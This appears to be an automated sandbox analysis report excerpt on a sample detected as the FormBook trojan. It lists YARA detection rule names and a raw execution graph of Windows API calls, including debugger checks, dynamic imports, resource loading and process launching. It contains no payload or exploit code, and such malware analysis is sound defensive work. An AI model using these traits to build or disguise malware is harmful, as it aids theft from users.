                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:moderate
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:3%
                                          Dynamic/Decrypted Code Coverage:1.1%
                                          Signature Coverage:4.6%
                                          Total number of Nodes:1619
                                          Total number of Limit Nodes:165
                                          execution_graph 108073 1306a80 108074 1306a8c _raise 108073->108074 108110 1308b7b GetStartupInfoW 108074->108110 108076 1306a91 108112 130a937 GetProcessHeap 108076->108112 108078 1306ae9 108079 1306af4 108078->108079 108194 1306bd0 47 API calls 3 library calls 108078->108194 108113 13087d7 108079->108113 108082 1306afa 108083 1306b05 __RTC_Initialize 108082->108083 108195 1306bd0 47 API calls 3 library calls 108082->108195 108134 130ba66 108083->108134 108086 1306b14 108087 1306b20 GetCommandLineW 108086->108087 108196 1306bd0 47 API calls 3 library calls 108086->108196 108153 1313c2d GetEnvironmentStringsW 108087->108153 108090 1306b1f 108090->108087 108093 1306b3a 108094 1306b45 108093->108094 108197 1301d7b 47 API calls 3 library calls 108093->108197 108163 1313a64 108094->108163 108097 1306b4b 108098 1306b56 108097->108098 108198 1301d7b 47 API calls 3 library calls 108097->108198 108177 1301db5 108098->108177 108101 1306b5e 108103 1306b69 __wwincmdln 108101->108103 108199 1301d7b 47 API calls 3 library calls 108101->108199 108181 12e3682 108103->108181 108105 1306b7d 108106 1306b8c 108105->108106 108200 1302011 47 API calls _doexit 108105->108200 108201 1301da6 47 API calls _doexit 108106->108201 108109 1306b91 _raise 108111 1308b91 108110->108111 108111->108076 108112->108078 108206 1301e5a 30 API calls 2 library calls 108113->108206 108115 13087dc 108202 1308ab3 108115->108202 108118 13087e5 108207 130884d 50 API calls 2 library calls 108118->108207 108121 13087ea 108121->108082 108122 13087f7 108122->108118 108123 1308802 108122->108123 108209 1307616 108123->108209 108126 1308844 108217 130884d 50 API calls 2 library calls 108126->108217 108129 1308849 108129->108082 108130 1308823 108130->108126 108131 1308829 108130->108131 108216 1308724 47 API calls 4 library calls 108131->108216 108133 1308831 GetCurrentThreadId 108133->108082 108135 130ba72 _raise 108134->108135 108226 1308984 108135->108226 108137 130ba79 
[Execution graph: the interactive call graph (node IDs, code addresses and edges) is not rendered in this export. The Windows API calls that label its nodes are the recoverable information, grouped here by purpose:]

CRT start-up and heap: GetStartupInfoW, GetStdHandle, GetFileType, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, TlsAlloc, TlsSetValue, HeapAlloc, RtlAllocateHeap, HeapFree, GetLastError, GetModuleFileNameW, FreeEnvironmentStringsW, IsProcessorFeaturePresent, GetModuleHandleExW, ExitProcess, RaiseException, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter

Debugger detection: IsDebuggerPresent appears on two nodes, one inside the CRT fault-reporting path (__call_reportfault) and one in the program's own start-up path, where one of the two outgoing branches leads to MessageBoxA

Dynamic import resolution: LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary

Embedded resource access: FindResourceExW, LoadResource, SizeofResource, LockResource, CreateStreamOnHGlobal, EnumResourceNamesW

Token / privilege check: AllocateAndInitializeSid, CheckTokenMembership, FreeSid

Launching and waiting on other processes: GetForegroundWindow, ShellExecuteW, WaitForSingleObject, GetExitCodeProcess, CloseHandle

Timing: Sleep, timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemTimeAsFileTime

Window, shell and message loop: IsThemeActive, SystemParametersInfoW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetFullPathNameW, GetOpenFileNameW, SHGetMalloc, SHGetDesktopFolder, SHGetPathFromIDListW, GetSysColorBrush, LoadCursorW, LoadIconW, LoadImageW, RegisterClassExW, CreateWindowExW, ShowWindow, Shell_NotifyIconW, DestroyIcon, LoadStringW, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, LockWindowUpdate, DestroyWindow, InterlockedDecrement
109344->109341 109345 1359ad8 109431 12fdf08 48 API calls 109345->109431 109347->108550 109349 12f469f 109348->109349 109350 12f4537 109348->109350 109351 12ecaee 48 API calls 109349->109351 109352 1357820 109350->109352 109353 12f4543 109350->109353 109360 12f45e4 Mailbox 109351->109360 109488 133e713 346 API calls Mailbox 109352->109488 109487 12f4040 346 API calls _memmove 109353->109487 109356 135782c 109357 12f4639 Mailbox 109356->109357 109489 132d520 86 API calls 4 library calls 109356->109489 109357->108550 109359 12f4559 109359->109356 109359->109357 109359->109360 109362 12e3e39 84 API calls 109360->109362 109440 13301e4 109360->109440 109481 12fdd84 109360->109481 109484 1340bfa 109360->109484 109362->109357 109365->108550 109366->108550 109367->108550 109368->108550 109369->108550 109370->108505 109371->108497 109372->108501 109373->108550 109374->108550 109375->108550 109376->108545 109377->108545 109378->108545 109380 12efa60 109379->109380 109416 12efa8e Mailbox _memmove 109379->109416 109381 130010a 48 API calls 109380->109381 109381->109416 109382 12f1063 109778 132d520 86 API calls 4 library calls 109382->109778 109383 12f105e 109774 12ec935 48 API calls 109383->109774 109385 12ed3d2 48 API calls 109385->109416 109387 12f0119 109779 132d520 86 API calls 4 library calls 109387->109779 109389 12ec935 48 API calls 109389->109416 109391 12f0dee 109768 12ed89e 50 API calls Mailbox 109391->109768 109392 1301b2a 52 API calls __cinit 109392->109416 109393 130010a 48 API calls 109393->109416 109394 135b772 109780 132d520 86 API calls 4 library calls 109394->109780 109395 12f0dfa 109769 12ed89e 50 API calls Mailbox 109395->109769 109400 12f0e83 109404 12ecaee 48 API calls 109400->109404 109402 135b7d2 109403 131a599 InterlockedDecrement 109403->109416 109412 12f10f1 Mailbox 109404->109412 109407 12f1230 109409 12efbf1 Mailbox 109407->109409 109777 132d520 86 API calls 4 library calls 109407->109777 109409->108550 109410 12efa40 346 API calls 109410->109416 
109776 132d520 86 API calls 4 library calls 109412->109776 109414 135b583 109775 132d520 86 API calls 4 library calls 109414->109775 109416->109382 109416->109383 109416->109385 109416->109387 109416->109389 109416->109391 109416->109392 109416->109393 109416->109394 109416->109395 109416->109400 109416->109403 109416->109407 109416->109409 109416->109410 109416->109412 109416->109414 109417 1340bfa 129 API calls 109416->109417 109766 12ef6d0 346 API calls 2 library calls 109416->109766 109767 12f1620 59 API calls Mailbox 109416->109767 109770 133ee52 82 API calls 2 library calls 109416->109770 109771 133ef9d 90 API calls Mailbox 109416->109771 109772 132b020 48 API calls 109416->109772 109773 133e713 346 API calls Mailbox 109416->109773 109417->109416 109418->108545 109419->108545 109420->108545 109421->109337 109422->109304 109423->109332 109424->109337 109425->109347 109426->109337 109427->109337 109428->109336 109429->109344 109430->109345 109431->109344 109432->109337 109433->109337 109434->109329 109435->109347 109436->109347 109437->109327 109438->109347 109439->109347 109441 1330218 109440->109441 109442 133020d 109440->109442 109490 12e84a6 109441->109490 109574 12ecdb4 48 API calls 109442->109574 109445 1330232 109446 1330254 109445->109446 109447 133033c 109445->109447 109456 1330366 109445->109456 109448 12e84a6 81 API calls 109446->109448 109449 12e3f9b 136 API calls 109447->109449 109454 1330260 _wcscpy _wcschr 109448->109454 109450 133034d 109449->109450 109451 1330362 109450->109451 109452 12e3f9b 136 API calls 109450->109452 109453 12e84a6 81 API calls 109451->109453 109451->109456 109452->109451 109455 133039b 109453->109455 109460 1330284 _wcscat _wcscpy 109454->109460 109464 13302b2 _wcscat 109454->109464 109510 130297d 109455->109510 109456->109357 109458 12e84a6 81 API calls 109459 13302d0 _wcscpy 109458->109459 109575 1327c0c GetFileAttributesW 109459->109575 109462 12e84a6 81 API calls 109460->109462 109462->109464 109463 13302f0 __wsetenvp 
109463->109456 109466 12e84a6 81 API calls 109463->109466 109464->109458 109465 13303bf _wcscat _wcscpy 109468 12e84a6 81 API calls 109465->109468 109467 133031c 109466->109467 109576 1326b3f 77 API calls 4 library calls 109467->109576 109470 1330456 109468->109470 109513 1327334 109470->109513 109471 1330330 109471->109456 109473 1330476 109474 12fdd84 3 API calls 109473->109474 109475 1330485 109474->109475 109476 12e84a6 81 API calls 109475->109476 109478 13304b6 109475->109478 109477 133049f 109476->109477 109519 132c890 109477->109519 109480 12e3e39 84 API calls 109478->109480 109480->109456 109675 12fdd92 GetFileAttributesW 109481->109675 109680 133f79f 109484->109680 109486 1340c0a 109486->109357 109487->109359 109488->109356 109489->109357 109491 12e84be 109490->109491 109508 12e84ba 109490->109508 109492 1355592 __i64tow 109491->109492 109493 1355494 109491->109493 109494 12e84d2 109491->109494 109504 12e84ea __itow Mailbox _wcscpy 109491->109504 109495 135557a 109493->109495 109499 135549d 109493->109499 109577 130234b 80 API calls 4 library calls 109494->109577 109578 130234b 80 API calls 4 library calls 109495->109578 109497 130010a 48 API calls 109500 12e84f4 109497->109500 109501 13554bc 109499->109501 109499->109504 109503 12ecaee 48 API calls 109500->109503 109500->109508 109502 130010a 48 API calls 109501->109502 109505 13554d9 109502->109505 109503->109508 109504->109497 109506 130010a 48 API calls 109505->109506 109507 13554ff 109506->109507 109507->109508 109509 12ecaee 48 API calls 109507->109509 109508->109445 109509->109508 109579 13029c7 109510->109579 109514 1327341 _wcschr __ftell_nolock 109513->109514 109515 130297d __wsplitpath 47 API calls 109514->109515 109518 1327357 _wcscat _wcscpy 109514->109518 109516 1327389 109515->109516 109517 130297d __wsplitpath 47 API calls 109516->109517 109517->109518 109518->109473 109520 132c89d __ftell_nolock 109519->109520 109521 130010a 48 API calls 109520->109521 109522 132c8fa 109521->109522 109523 
12e4bce 48 API calls 109522->109523 109524 132c904 109523->109524 109525 132c6a0 GetSystemTimeAsFileTime 109524->109525 109526 132c90f 109525->109526 109527 12e41a7 83 API calls 109526->109527 109528 132c922 _wcscmp 109527->109528 109529 132c9f3 109528->109529 109530 132c946 109528->109530 109531 132ce59 94 API calls 109529->109531 109532 132ce59 94 API calls 109530->109532 109547 132c9bf _wcscat 109531->109547 109533 132c94b 109532->109533 109534 130297d __wsplitpath 47 API calls 109533->109534 109536 132c9fc 109533->109536 109539 132c974 _wcscat _wcscpy 109534->109539 109535 12e417d 64 API calls 109537 132ca18 109535->109537 109536->109478 109538 12e417d 64 API calls 109537->109538 109540 132ca28 109538->109540 109542 130297d __wsplitpath 47 API calls 109539->109542 109541 12e417d 64 API calls 109540->109541 109543 132ca43 109541->109543 109542->109547 109544 12e417d 64 API calls 109543->109544 109545 132ca53 109544->109545 109546 12e417d 64 API calls 109545->109546 109548 132ca6e 109546->109548 109547->109535 109547->109536 109549 12e417d 64 API calls 109548->109549 109550 132ca7e 109549->109550 109551 12e417d 64 API calls 109550->109551 109552 132ca8e 109551->109552 109553 12e417d 64 API calls 109552->109553 109554 132ca9e 109553->109554 109605 132d009 GetTempPathW GetTempFileNameW 109554->109605 109556 132caaa 109557 1304129 117 API calls 109556->109557 109568 132cabb 109557->109568 109558 132cb75 109559 1304274 __fcloseall 83 API calls 109558->109559 109560 132cb80 109559->109560 109562 132cb86 DeleteFileW 109560->109562 109563 132cb9a 109560->109563 109561 12e417d 64 API calls 109561->109568 109562->109536 109564 132cc2e CopyFileW 109563->109564 109569 132cba4 109563->109569 109565 132cc56 DeleteFileW 109564->109565 109566 132cc44 DeleteFileW 109564->109566 109619 132cfc8 CreateFileW 109565->109619 109566->109536 109568->109536 109568->109558 109568->109561 109606 130373e 109568->109606 109571 132c251 118 API calls 109569->109571 109572 132cc19 
109571->109572 109572->109565 109573 132cc1d DeleteFileW 109572->109573 109573->109536 109574->109441 109575->109463 109576->109471 109577->109504 109578->109504 109580 13029e2 109579->109580 109583 13029d6 109579->109583 109603 130889e 47 API calls __getptd_noexit 109580->109603 109582 1302b9a 109587 13029c2 109582->109587 109604 1307aa0 8 API calls __controlfp_s 109582->109604 109583->109580 109591 1302a55 109583->109591 109598 130a9fb 47 API calls 2 library calls 109583->109598 109586 1302b21 109586->109580 109586->109587 109589 1302b31 109586->109589 109587->109465 109588 1302ae0 109588->109580 109590 1302afc 109588->109590 109600 130a9fb 47 API calls 2 library calls 109588->109600 109602 130a9fb 47 API calls 2 library calls 109589->109602 109590->109580 109590->109587 109594 1302b12 109590->109594 109591->109580 109597 1302ac2 109591->109597 109599 130a9fb 47 API calls 2 library calls 109591->109599 109601 130a9fb 47 API calls 2 library calls 109594->109601 109597->109586 109597->109588 109598->109591 109599->109597 109600->109590 109601->109587 109602->109587 109603->109582 109604->109587 109605->109556 109607 130374a _raise 109606->109607 109608 1303774 _raise 109607->109608 109609 1303764 109607->109609 109610 130377c 109607->109610 109608->109568 109634 130889e 47 API calls __getptd_noexit 109609->109634 109612 1305a9f __lock_file 48 API calls 109610->109612 109614 1303782 109612->109614 109613 1303769 109635 1307aa0 8 API calls __controlfp_s 109613->109635 109622 13035e7 109614->109622 109620 132d004 109619->109620 109621 132cfee SetFileTime CloseHandle 109619->109621 109620->109536 109621->109620 109625 13035f6 109622->109625 109628 1303614 109622->109628 109623 1303604 109658 130889e 47 API calls __getptd_noexit 109623->109658 109625->109623 109625->109628 109632 130362c _memmove 109625->109632 109626 1303609 109659 1307aa0 8 API calls __controlfp_s 109626->109659 109636 13037b4 LeaveCriticalSection LeaveCriticalSection _fseek 109628->109636 109630 
1303914 __flush 78 API calls 109630->109632 109631 13035c3 __fputwc_nolock 47 API calls 109631->109632 109632->109628 109632->109630 109632->109631 109633 130bd14 __flswbuf 78 API calls 109632->109633 109637 1309af3 109632->109637 109633->109632 109634->109613 109635->109608 109636->109608 109638 13035c3 __fputwc_nolock 47 API calls 109637->109638 109639 1309b01 109638->109639 109640 1309b23 109639->109640 109641 1309b0c 109639->109641 109643 1309b28 109640->109643 109648 1309b35 __flswbuf 109640->109648 109663 130889e 47 API calls __getptd_noexit 109641->109663 109664 130889e 47 API calls __getptd_noexit 109643->109664 109644 1309b11 109644->109632 109646 1309c13 109651 130bd14 __flswbuf 78 API calls 109646->109651 109647 1309b99 109649 1309bb3 109647->109649 109650 1309bca 109647->109650 109648->109644 109654 1309b84 109648->109654 109657 1309b8f 109648->109657 109665 13149a2 109648->109665 109652 130bd14 __flswbuf 78 API calls 109649->109652 109650->109644 109674 13104e3 52 API calls 7 library calls 109650->109674 109651->109644 109652->109644 109654->109657 109660 1314bd4 109654->109660 109657->109646 109657->109647 109658->109626 109659->109628 109661 1307660 __malloc_crt 47 API calls 109660->109661 109662 1314be9 109661->109662 109662->109657 109663->109644 109664->109644 109666 13149ba 109665->109666 109667 13149ad 109665->109667 109669 13149c6 109666->109669 109670 130889e __calloc_impl 47 API calls 109666->109670 109668 130889e __calloc_impl 47 API calls 109667->109668 109671 13149b2 109668->109671 109669->109654 109672 13149e7 109670->109672 109671->109654 109673 1307aa0 __controlfp_s 8 API calls 109672->109673 109673->109671 109674->109644 109676 1354a7d FindFirstFileW 109675->109676 109677 12fdd89 109675->109677 109678 1354a95 FindClose 109676->109678 109679 1354a8e 109676->109679 109677->109357 109679->109678 109681 12e84a6 81 API calls 109680->109681 109682 133f7db 109681->109682 109687 133f81d Mailbox 109682->109687 109716 1340458 109682->109716 
109684 133fa7c 109685 133fbeb 109684->109685 109690 133fa86 109684->109690 109752 1340579 89 API calls Mailbox 109685->109752 109687->109486 109689 133fbf8 109689->109690 109692 133fc04 109689->109692 109729 133f5fb 109690->109729 109691 12e84a6 81 API calls 109706 133f875 Mailbox 109691->109706 109692->109687 109697 133faba 109743 12ff92c 109697->109743 109700 133fad4 109749 132d520 86 API calls 4 library calls 109700->109749 109701 133faee 109703 12e3320 48 API calls 109701->109703 109705 133fb05 109703->109705 109704 133fadf GetCurrentProcess TerminateProcess 109704->109701 109707 12f14a0 48 API calls 109705->109707 109715 133fb2f 109705->109715 109706->109684 109706->109687 109706->109691 109747 13428d9 48 API calls _memmove 109706->109747 109748 133fc96 60 API calls 2 library calls 109706->109748 109709 133fb1e 109707->109709 109708 133fc56 109708->109687 109712 133fc6f FreeLibrary 109708->109712 109750 1340300 105 API calls _free 109709->109750 109711 12f14a0 48 API calls 109711->109715 109712->109687 109715->109708 109715->109711 109751 12ed89e 50 API calls Mailbox 109715->109751 109753 1340300 105 API calls _free 109715->109753 109717 12eb8a7 48 API calls 109716->109717 109718 1340473 CharLowerBuffW 109717->109718 109754 133267a 109718->109754 109722 12ed3d2 48 API calls 109723 13404ac 109722->109723 109761 12e7f40 48 API calls _memmove 109723->109761 109725 13404c3 109726 12ea2fb 48 API calls 109725->109726 109728 13404cf Mailbox 109726->109728 109727 134050b Mailbox 109727->109706 109728->109727 109762 133fc96 60 API calls 2 library calls 109728->109762 109730 133f616 109729->109730 109734 133f66b 109729->109734 109731 130010a 48 API calls 109730->109731 109732 133f638 109731->109732 109733 130010a 48 API calls 109732->109733 109732->109734 109733->109732 109735 1340719 109734->109735 109736 1340944 Mailbox 109735->109736 109742 134073c _strcat _wcscpy __wsetenvp 109735->109742 109736->109697 109737 12ecdb4 48 API calls 109737->109742 109738 12ed00b 58 
API calls 109738->109742 109739 12e84a6 81 API calls 109739->109742 109740 13045ec 47 API calls std::exception::_Copy_str 109740->109742 109742->109736 109742->109737 109742->109738 109742->109739 109742->109740 109765 1328932 50 API calls __wsetenvp 109742->109765 109744 12ff941 109743->109744 109745 12ff9d9 VirtualAlloc 109744->109745 109746 12ff9a7 109744->109746 109745->109746 109746->109700 109746->109701 109747->109706 109748->109706 109749->109704 109750->109715 109751->109715 109752->109689 109753->109715 109755 13326a4 __wsetenvp 109754->109755 109756 13326e2 109755->109756 109758 13326d8 109755->109758 109759 1332763 109755->109759 109756->109722 109756->109728 109758->109756 109763 12fdfd2 60 API calls 109758->109763 109759->109756 109764 12fdfd2 60 API calls 109759->109764 109761->109725 109762->109727 109763->109758 109764->109759 109765->109742 109766->109416 109767->109416 109768->109395 109769->109400 109770->109416 109771->109416 109772->109416 109773->109416 109774->109409 109775->109412 109776->109409 109777->109382 109778->109387 109779->109394 109780->109402 109781 135a0a7 109785 132af66 109781->109785 109783 135a0b2 109784 132af66 84 API calls 109783->109784 109784->109783 109786 132afa0 109785->109786 109791 132af73 109785->109791 109786->109783 109787 132afa2 109806 12ff833 81 API calls 109787->109806 109789 132afa7 109790 12e84a6 81 API calls 109789->109790 109792 132afae 109790->109792 109791->109786 109791->109787 109791->109789 109794 132af9a 109791->109794 109796 12e7b4b 109792->109796 109805 12f4265 61 API calls _memmove 109794->109805 109797 12e7b5d 109796->109797 109798 135240d 109796->109798 109807 12ebbd9 109797->109807 109813 131c0a2 48 API calls _memmove 109798->109813 109801 12e7b69 109801->109786 109802 1352417 109814 12ec935 48 API calls 109802->109814 109804 135241f Mailbox 109805->109786 109806->109789 109808 12ebbe7 109807->109808 109809 12ebc0d _memmove 109807->109809 109808->109809 109810 130010a 48 API calls 
109808->109810 109809->109801 109811 12ebc5c 109810->109811 109812 130010a 48 API calls 109811->109812 109812->109809 109813->109802 109814->109804 109815 2623b0 109829 260000 109815->109829 109817 262473 109832 2622a0 109817->109832 109819 26249c CreateFileW 109821 2624f0 109819->109821 109822 2624eb 109819->109822 109821->109822 109823 262507 VirtualAlloc 109821->109823 109823->109822 109824 262525 ReadFile 109823->109824 109824->109822 109825 262540 109824->109825 109826 2612a0 12 API calls 109825->109826 109827 262573 109826->109827 109828 262596 ExitProcess 109827->109828 109828->109822 109835 2634a0 GetPEB 109829->109835 109831 26068b 109831->109817 109833 2622a9 Sleep 109832->109833 109834 2622b7 109833->109834 109836 2634ca 109835->109836 109836->109831 109837 1351eed 109842 12fe975 109837->109842 109839 1351f01 109858 1301b2a 52 API calls __cinit 109839->109858 109841 1351f0b 109843 130010a 48 API calls 109842->109843 109844 12fea27 GetModuleFileNameW 109843->109844 109845 130297d __wsplitpath 47 API calls 109844->109845 109846 12fea5b _wcsncat 109845->109846 109859 1302bff 109846->109859 109849 130010a 48 API calls 109850 12fea94 _wcscpy 109849->109850 109851 12ed3d2 48 API calls 109850->109851 109852 12feacf 109851->109852 109862 12feb05 109852->109862 109854 12feae0 Mailbox 109854->109839 109855 12ea4f6 48 API calls 109857 12feada _wcscat __wsetenvp _wcsncpy 109855->109857 109856 130010a 48 API calls 109856->109857 109857->109854 109857->109855 109857->109856 109858->109841 109876 130aab9 109859->109876 109888 12ec4cd 109862->109888 109864 12feb14 RegOpenKeyExW 109865 1354b17 RegQueryValueExW 109864->109865 109866 12feb35 109864->109866 109867 1354b91 RegCloseKey 109865->109867 109868 1354b30 109865->109868 109866->109857 109869 130010a 48 API calls 109868->109869 109870 1354b49 109869->109870 109871 12e4bce 48 API calls 109870->109871 109872 1354b53 RegQueryValueExW 109871->109872 109873 1354b6f 109872->109873 109874 1354b86 109872->109874 109875 
12e7e53 48 API calls 109873->109875 109874->109867 109875->109874 109877 130abc6 109876->109877 109878 130aaca 109876->109878 109886 130889e 47 API calls __getptd_noexit 109877->109886 109878->109877 109884 130aad5 109878->109884 109880 130abbb 109887 1307aa0 8 API calls __controlfp_s 109880->109887 109882 12fea8a 109882->109849 109884->109882 109885 130889e 47 API calls __getptd_noexit 109884->109885 109885->109880 109886->109880 109887->109882 109889 12ec4da 109888->109889 109890 12ec4e7 109888->109890 109889->109864 109891 130010a 48 API calls 109890->109891 109891->109889 109892 12e29c2 109893 12e29cb 109892->109893 109894 12e2a48 109893->109894 109895 12e29e9 109893->109895 109932 12e2a46 109893->109932 109899 12e2a4e 109894->109899 109900 1352307 109894->109900 109896 12e2aac PostQuitMessage 109895->109896 109897 12e29f6 109895->109897 109904 12e2a39 109896->109904 109902 135238f 109897->109902 109903 12e2a01 109897->109903 109898 12e2a2b DefWindowProcW 109898->109904 109905 12e2a76 SetTimer RegisterWindowMessageW 109899->109905 109906 12e2a53 109899->109906 109941 12e322e 16 API calls 109900->109941 109946 13257fb 60 API calls _memset 109902->109946 109908 12e2a09 109903->109908 109909 12e2ab6 109903->109909 109905->109904 109910 12e2a9f CreatePopupMenu 109905->109910 109912 12e2a5a KillTimer 109906->109912 109913 13522aa 109906->109913 109907 135232e 109942 12fec33 346 API calls Mailbox 109907->109942 109916 1352374 109908->109916 109917 12e2a14 109908->109917 109939 12e1e58 53 API calls _memset 109909->109939 109910->109904 109937 12e2b94 Shell_NotifyIconW _memset 109912->109937 109920 13522e3 MoveWindow 109913->109920 109921 13522af 109913->109921 109916->109898 109945 131b31f 48 API calls 109916->109945 109923 12e2a1f 109917->109923 109924 135235f 109917->109924 109918 13523a1 109918->109898 109918->109904 109920->109904 109926 13522b3 109921->109926 109927 13522d2 SetFocus 109921->109927 109922 12e2a6d 109938 12e2ac7 DeleteObject DestroyWindow Mailbox 
109922->109938 109923->109898 109943 12e2b94 Shell_NotifyIconW _memset 109923->109943 109944 1325fdb 70 API calls _memset 109924->109944 109925 12e2ac5 109925->109904 109926->109923 109930 13522bc 109926->109930 109927->109904 109940 12e322e 16 API calls 109930->109940 109932->109898 109935 1352353 109936 12e3598 67 API calls 109935->109936 109936->109932 109937->109922 109938->109904 109939->109925 109940->109904 109941->109907 109942->109923 109943->109935 109944->109925 109945->109932 109946->109918 109947 13137dc 109948 1313811 109947->109948 109951 13137ec 109947->109951 109950 131381c 109952 1308e19 SetUnhandledExceptionFilter 109950->109952 109951->109948 109954 13091d0 109951->109954 109953 1313827 109952->109953 109955 13091dc _raise 109954->109955 109960 130869d 47 API calls 2 library calls 109955->109960 109959 13091e1 109961 13148bb 48 API calls 3 library calls 109959->109961 109960->109959 109962 1351e8b 109967 12fe44f 109962->109967 109966 1351e9a 109968 130010a 48 API calls 109967->109968 109969 12fe457 109968->109969 109970 12fe46b 109969->109970 109975 12fe74b 109969->109975 109974 1301b2a 52 API calls __cinit 109970->109974 109974->109966 109976 12fe463 109975->109976 109977 12fe754 109975->109977 109979 12fe47b 109976->109979 110007 1301b2a 52 API calls __cinit 109977->110007 109980 12ed3d2 48 API calls 109979->109980 109981 12fe492 GetVersionExW 109980->109981 109982 12e7e53 48 API calls 109981->109982 109983 12fe4d5 109982->109983 110008 12fe5f8 109983->110008 109989 13529f9 109991 12fe55f GetCurrentProcess 110025 12fe70e LoadLibraryA GetProcAddress 109991->110025 109992 12fe576 109994 12fe59e 109992->109994 109995 12fe5ec GetSystemInfo 109992->109995 110019 12fe694 109994->110019 109996 12fe5c9 109995->109996 109998 12fe5dc 109996->109998 109999 12fe5d7 FreeLibrary 109996->109999 109998->109970 109999->109998 110001 12fe5e4 GetSystemInfo 110003 12fe5be 110001->110003 110002 12fe5b4 110022 12fe437 110002->110022 110003->109996 110005 12fe5c4 
FreeLibrary 110003->110005 110005->109996 110007->109976 110009 12fe601 110008->110009 110010 12ea2fb 48 API calls 110009->110010 110011 12fe4dd 110010->110011 110012 12fe617 110011->110012 110013 12fe625 110012->110013 110014 12ea2fb 48 API calls 110013->110014 110015 12fe4e9 110014->110015 110015->109989 110016 12fe6d1 110015->110016 110026 12fe6e3 110016->110026 110030 12fe6a6 110019->110030 110023 12fe694 2 API calls 110022->110023 110024 12fe43f GetNativeSystemInfo 110023->110024 110024->110003 110025->109992 110027 12fe55b 110026->110027 110028 12fe6ec LoadLibraryA 110026->110028 110027->109991 110027->109992 110028->110027 110029 12fe6fd GetProcAddress 110028->110029 110029->110027 110031 12fe5ac 110030->110031 110032 12fe6af LoadLibraryA 110030->110032 110031->110001 110031->110002 110032->110031 110033 12fe6c0 GetProcAddress 110032->110033 110033->110031 110034 1351edb 110039 12e131c 110034->110039 110036 1351ee1 110072 1301b2a 52 API calls __cinit 110036->110072 110038 1351eeb 110040 12e133e 110039->110040 110073 12e1624 110040->110073 110045 12ed3d2 48 API calls 110046 12e137e 110045->110046 110047 12ed3d2 48 API calls 110046->110047 110048 12e1388 110047->110048 110049 12ed3d2 48 API calls 110048->110049 110050 12e1392 110049->110050 110051 12ed3d2 48 API calls 110050->110051 110052 12e13d8 110051->110052 110053 12ed3d2 48 API calls 110052->110053 110054 12e14bb 110053->110054 110081 12e1673 110054->110081 110058 12e14eb 110059 12ed3d2 48 API calls 110058->110059 110060 12e14f5 110059->110060 110110 12e175e 110060->110110 110062 12e1540 110063 12e1550 GetStdHandle 110062->110063 110064 12e15ab 110063->110064 110065 13558da 110063->110065 110066 12e15b1 CoInitialize 110064->110066 110065->110064 110067 13558e3 110065->110067 110066->110036 110117 1329bd1 53 API calls 110067->110117 110069 13558ea 110118 132a2f6 CreateThread 110069->110118 110071 13558f6 CloseHandle 110071->110066 110072->110038 110119 12e17e0 110073->110119 110076 12e7e53 48 API calls 
110077 12e1344 110076->110077 110078 12e16db 110077->110078 110133 12e1867 6 API calls 110078->110133 110080 12e1374 110080->110045 110082 12ed3d2 48 API calls 110081->110082 110083 12e1683 110082->110083 110084 12ed3d2 48 API calls 110083->110084 110085 12e168b 110084->110085 110134 12e7d70 110085->110134 110088 12e7d70 48 API calls 110089 12e169b 110088->110089 110090 12ed3d2 48 API calls 110089->110090 110091 12e16a6 110090->110091 110092 130010a 48 API calls 110091->110092 110093 12e14c5 110092->110093 110094 12e16f2 110093->110094 110095 12e1700 110094->110095 110096 12ed3d2 48 API calls 110095->110096 110097 12e170b 110096->110097 110098 12ed3d2 48 API calls 110097->110098 110099 12e1716 110098->110099 110100 12ed3d2 48 API calls 110099->110100 110101 12e1721 110100->110101 110102 12ed3d2 48 API calls 110101->110102 110103 12e172c 110102->110103 110104 12e7d70 48 API calls 110103->110104 110105 12e1737 110104->110105 110106 130010a 48 API calls 110105->110106 110107 12e173e 110106->110107 110108 13524a6 110107->110108 110109 12e1747 RegisterWindowMessageW 110107->110109 110109->110058 110111 12e176e 110110->110111 110112 13567dd 110110->110112 110113 130010a 48 API calls 110111->110113 110139 132d231 50 API calls 110112->110139 110115 12e1776 110113->110115 110115->110062 110116 13567e8 110117->110069 110118->110071 110140 132a2dc 54 API calls 110118->110140 110126 12e17fc 110119->110126 110122 12e17fc 48 API calls 110123 12e17f0 110122->110123 110124 12ed3d2 48 API calls 110123->110124 110125 12e165b 110124->110125 110125->110076 110127 12ed3d2 48 API calls 110126->110127 110128 12e1807 110127->110128 110129 12ed3d2 48 API calls 110128->110129 110130 12e180f 110129->110130 110131 12ed3d2 48 API calls 110130->110131 110132 12e17e8 110131->110132 110132->110122 110133->110080 110135 12ed3d2 48 API calls 110134->110135 110136 12e7d79 110135->110136 110137 12ed3d2 48 API calls 110136->110137 110138 12e1693 110137->110138 110138->110088 110139->110116 110141 
1351eca 110146 12fbe17 110141->110146 110145 1351ed9 110147 12ed3d2 48 API calls 110146->110147 110148 12fbe85 110147->110148 110155 12fc929 110148->110155 110150 135db92 110152 12fbf22 110152->110150 110153 12fbf3e 110152->110153 110158 12fc8b7 48 API calls _memmove 110152->110158 110154 1301b2a 52 API calls __cinit 110153->110154 110154->110145 110159 12fc955 110155->110159 110158->110152 110160 12fc962 110159->110160 110161 12fc948 110159->110161 110160->110161 110162 12fc969 RegOpenKeyExW 110160->110162 110161->110152 110162->110161 110163 12fc983 RegQueryValueExW 110162->110163 110164 12fc9b9 RegCloseKey 110163->110164 110165 12fc9a4 110163->110165 110164->110161 110165->110164

Control-flow Graph

